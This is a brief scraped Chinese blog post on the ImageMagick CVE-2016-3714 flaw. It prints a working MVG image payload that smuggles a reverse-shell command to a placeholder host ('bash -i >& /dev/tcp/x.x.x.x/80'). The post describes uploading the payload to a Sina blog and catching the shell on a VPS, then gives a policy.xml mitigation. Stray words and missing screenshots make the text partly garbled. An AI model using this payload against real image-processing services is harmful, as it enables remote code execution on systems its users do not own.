CVE-2016-3714- ImageMagick command excute analysis

Vulnerability exploit method are as follows:shell

新浪博客發圖片的地方
 bash

1.png



選擇圖片

圖片內容爲
 dom

code 區域tcp

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context


 

2.png



一步一步點到保存成功
 url

3.png



開始上傳
 code

4.png




 

5.png



shell躺在了vps上
 xml

result.png

修復建議:vps

使用策略文件暫時禁用ImageMagick。可在「/etc/ImageMagick/policy.xml」文件中添加以下代碼:圖片

<policymap>
<policy domain=」coder」 rights=」none」 pattern=」EPHEMERAL」 />
<policy domain=」coder」 rights=」none」 pattern=」URL」 />
<policy domain=」coder」 rights=」none」 pattern=」HTTPS」 />
<policy domain=」coder」 rights=」none」 pattern=」MVG」 />
<policy domain=」coder」 rights=」none」 pattern=」MSL」 />
</policymap>get

相關文章
相關標籤/搜索